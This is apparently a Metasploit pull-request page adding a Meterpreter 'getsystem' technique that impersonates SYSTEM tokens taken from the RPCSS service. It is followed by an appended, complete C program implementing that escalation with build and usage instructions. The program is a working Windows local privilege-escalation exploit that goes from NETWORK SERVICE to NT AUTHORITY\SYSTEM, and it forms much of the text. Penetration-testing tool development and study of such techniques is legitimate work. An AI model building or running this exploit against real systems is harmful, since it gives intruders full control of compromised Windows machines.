New GetSystem Technique: Named Pipe Impersonation (RPCSS Variant) #14030
Conversation
Unassigning due to some local issues on my PC which are slowing testing of this PR. Feel free to assign this issue to someone else if I don't get back to this in time, and apologies for the delay!
I was not able to get the powershell magic working, so I used psexec from sysinternals. To launch the payload with

When the payload calls back:
This looks good, but I'm going to let it hang around for a few days in hopes that @OJ drops in and gives it a once-over.
Release Notes: This ports https://github.com/sailay1996/RpcSsImpersonator to Meterpreter as GetSystem technique 4. It is a riff on the classic named pipe impersonation, but instead leverages the behavior of LSASS to return the first token for a process when a specific path is used. This can be abused by processes running as Network Service to open a handle to the RPCSS service which also runs as Network Service but contains tokens for NT AUTHORITY\SYSTEM. This also includes two payload version bumps to account for (1) the payload side to implement this functionality, and a separate, unrelated PR to add a security.MD document to payloads.
This ports https://github.com/sailay1996/RpcSsImpersonator to Meterpreter as GetSystem technique 4. It is a riff on the classic named pipe impersonation, but instead leverages the behavior of LSASS to return the first token for a process when a specific path is used. This can be abused by processes running as Network Service to open a handle to the RPCSS service which also runs as Network Service but contains tokens for NT AUTHORITY\SYSTEM 🎉. In order to make this more dynamic, when filtering out the token handles for the RPCSS service, I select the SYSTEM token with the most privileges (to account for filtered tokens). This should select the best / most-privileged SYSTEM token on multiple versions of Windows, instead of using the hard-coded value of 22 as described in Faxing Your Way To System.
This is the Framework side of rapid7/metasploit-payloads#431.
I also fixed a bug where the service name parameter was missing for the most common technique (1). This fixes the `getsystem -t 1` command.

I tested this code in the following environments:
While I also tested Windows 7, the `NtQueryInformationProcess` command reported that the ProcessHandleInformation was unavailable by returning NT status 0xc0000003 (STATUS_INVALID_INFO_CLASS). Because of that, I pinned this to Windows versions 6.3 and newer which is Windows 8.1 / Server 2012 R2. On older systems, Meterpreter will fail with `ERROR_CALL_NOT_IMPLEMENTED`.

For reference on this technique:
I also want to note that I think this escalation technique is a good candidate for incorporation into `getsystem` for the following reasons (as opposed to implementation as a local exploit module via an RDLL).
Verification

- Place the Meterpreter payloads built from rapid7/metasploit-payloads#431 in `~/.msf4/payloads/meterpreter`
- Start `msfconsole` and setup a handler for a native Windows Meterpreter
- Get a session running as `NT AUTHORITY\NETWORK SERVICE` (use these steps)
- Run `getsystem`, you should see that it was successful using technique 4
- Running `getsystem` without a specific technique causes all of them to be attempted sequentially, so this also shows that the existing techniques 1-3 did not work

Demo
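The mechanism the PR description sketches, as an added example that is not code from the PR, from Meterpreter or from RpcSsImpersonator: snapshot the handle table of a target process with `NtQueryInformationProcess(ProcessHandleInformation)`, duplicate each handle into our own process, keep the ones that are `NT AUTHORITY\SYSTEM` tokens, and impersonate the one carrying the most privileges rather than a hard-coded handle value. Assumptions: the caller already runs as NETWORK SERVICE and is given the PID of the RPCSS service on the command line (looking it up through the SCM is left out); the `PROCESS_HANDLE_SNAPSHOT_INFORMATION` layout and the info class number 51 are the undocumented definitions commonly used for this class; `pick_best_system_token`, `inspect_token` and `collect_system_tokens` are names chosen here. The selection logic is plain portable C; the Win32 part is compiled only on Windows, and a missing info class (the Windows 7 case from the description) is reported as `ERROR_CALL_NOT_IMPLEMENTED`, mirroring the PR's behaviour.

```c
/* Added example, not code from the PR, Meterpreter or RpcSsImpersonator. */
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* One candidate found in the target's handle table. */
typedef struct {
    unsigned long handle_value;    /* handle value inside the target process */
    int is_system;                 /* token user SID == S-1-5-18 */
    unsigned long privilege_count; /* PrivilegeCount from TOKEN_PRIVILEGES */
} token_candidate;

/* Pick the SYSTEM token carrying the most privileges (filtered or restricted
 * copies carry fewer). Returns an index into c, or -1 if none is SYSTEM.
 * Ties keep the first match, i.e. the earliest handle in the snapshot. */
int pick_best_system_token(const token_candidate *c, size_t n) {
    int best = -1;
    for (size_t i = 0; i < n; i++) {
        if (!c[i].is_system) continue;
        if (best < 0 || c[i].privilege_count > c[best].privilege_count) best = (int)i;
    }
    return best;
}

#ifdef _WIN32
#include <windows.h>
#include <winternl.h>
#include <sddl.h>

#define ProcessHandleInformation 51 /* assumed: info class added in Windows 8 */
#define STATUS_INVALID_INFO_CLASS ((NTSTATUS)0xC0000003L)

/* Assumed (undocumented) layout of the ProcessHandleInformation snapshot. */
typedef struct {
    HANDLE HandleValue; ULONG_PTR HandleCount; ULONG_PTR PointerCount;
    ULONG GrantedAccess; ULONG ObjectTypeIndex; ULONG HandleAttributes; ULONG Reserved;
} PROCESS_HANDLE_TABLE_ENTRY_INFO;
typedef struct {
    ULONG_PTR NumberOfHandles; ULONG_PTR Reserved;
    PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1];
} PROCESS_HANDLE_SNAPSHOT_INFORMATION;
typedef NTSTATUS (NTAPI *NtQIP_t)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);

/* Fill out from a duplicated handle; returns 0 if it is not a token we can query. */
static int inspect_token(HANDLE h, token_candidate *out) {
    BYTE buf[256]; DWORD len = 0; LPSTR sid = NULL; TOKEN_PRIVILEGES *tp;
    /* Non-token objects fail here with ERROR_INVALID_HANDLE (object type mismatch). */
    if (!GetTokenInformation(h, TokenUser, buf, sizeof buf, &len)) return 0;
    if (!ConvertSidToStringSidA(((TOKEN_USER *)buf)->User.Sid, &sid)) return 0;
    out->is_system = strcmp(sid, "S-1-5-18") == 0;
    LocalFree(sid);
    GetTokenInformation(h, TokenPrivileges, NULL, 0, &len); /* sizing call */
    tp = HeapAlloc(GetProcessHeap(), 0, len);
    if (!tp || !GetTokenInformation(h, TokenPrivileges, tp, len, &len)) return 0;
    out->privilege_count = tp->PrivilegeCount;
    HeapFree(GetProcessHeap(), 0, tp);
    return 1;
}

/* Snapshot pid's handle table and collect duplicated SYSTEM tokens. Returns the
 * count, or -1 with *err = ERROR_CALL_NOT_IMPLEMENTED when the info class is
 * missing (pre-8.1 hosts) and the raw NTSTATUS for any other NT failure. */
static int collect_system_tokens(DWORD pid, token_candidate *out, HANDLE *dups,
                                 size_t max, DWORD *err) {
    NtQIP_t NtQIP = (NtQIP_t)GetProcAddress(GetModuleHandleA("ntdll.dll"),
                                            "NtQueryInformationProcess");
    HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE, FALSE, pid);
    PROCESS_HANDLE_SNAPSHOT_INFORMATION *snap; ULONG size = 0; NTSTATUS st; int n = 0;
    if (!NtQIP || !proc) { *err = GetLastError(); return -1; }
    st = NtQIP(proc, (PROCESSINFOCLASS)ProcessHandleInformation, NULL, 0, &size);
    if (st == STATUS_INVALID_INFO_CLASS) { *err = ERROR_CALL_NOT_IMPLEMENTED; return -1; }
    size += 4096; /* slack for handles the target opens between the two calls */
    snap = HeapAlloc(GetProcessHeap(), 0, size);
    st = NtQIP(proc, (PROCESSINFOCLASS)ProcessHandleInformation, snap, size, &size);
    if (st != 0) { *err = (DWORD)st; return -1; }
    for (ULONG_PTR i = 0; i < snap->NumberOfHandles && (size_t)n < max; i++) {
        HANDLE dup; token_candidate c = {0};
        /* Same access as RPCSS holds; impersonation needs TOKEN_IMPERSONATE or
         * TOKEN_QUERY | TOKEN_DUPLICATE on it. */
        if (!DuplicateHandle(proc, snap->Handles[i].HandleValue, GetCurrentProcess(),
                             &dup, 0, FALSE, DUPLICATE_SAME_ACCESS)) continue;
        c.handle_value = (unsigned long)(ULONG_PTR)snap->Handles[i].HandleValue;
        if (inspect_token(dup, &c) && c.is_system) { out[n] = c; dups[n++] = dup; }
        else CloseHandle(dup);
    }
    HeapFree(GetProcessHeap(), 0, snap); CloseHandle(proc);
    return n;
}

/* Usage (run as NETWORK SERVICE): rpcss_token.exe <pid of the RpcSs service> */
int main(int argc, char **argv) {
    token_candidate cands[64]; HANDLE dups[64]; DWORD err = 0; int n, best;
    if (argc != 2) { fputs("usage: rpcss_token.exe <pid>\n", stderr); return 2; }
    n = collect_system_tokens((DWORD)strtoul(argv[1], NULL, 10), cands, dups, 64, &err);
    if (n < 0) { fprintf(stderr, "snapshot failed, error 0x%lx\n", err); return 1; }
    best = pick_best_system_token(cands, (size_t)n);
    if (best < 0) { fputs("no SYSTEM token in target handle table\n", stderr); return 1; }
    if (!ImpersonateLoggedOnUser(dups[best])) {
        fprintf(stderr, "impersonation failed, error %lu\n", GetLastError()); return 1;
    }
    printf("impersonating SYSTEM via target handle 0x%lx (%lu privileges)\n",
           cands[best].handle_value, cands[best].privilege_count);
    RevertToSelf(); /* a real getsystem keeps the token and spawns a SYSTEM process */
    return 0;
}
#else
/* Off Windows only the selection logic runs, on constructed candidates. */
int main(void) {
    token_candidate t[3] = { {4, 0, 3}, {8, 1, 5}, {12, 1, 22} };
    printf("best SYSTEM token index: %d\n", pick_best_system_token(t, 3));
    return 0;
}
#endif
```

Build on Windows with `x86_64-w64-mingw32-gcc rpcss_token.c -o rpcss_token.exe -ladvapi32` (or cl.exe), run it as NETWORK SERVICE against the RPCSS PID, and expect `ERROR_CALL_NOT_IMPLEMENTED` (120) on Windows 7 and older where the info class does not exist. Preferring the token with the largest `PrivilegeCount` is what makes the choice version-independent: a filtered or restricted SYSTEM token in the same table has fewer privileges and loses the comparison.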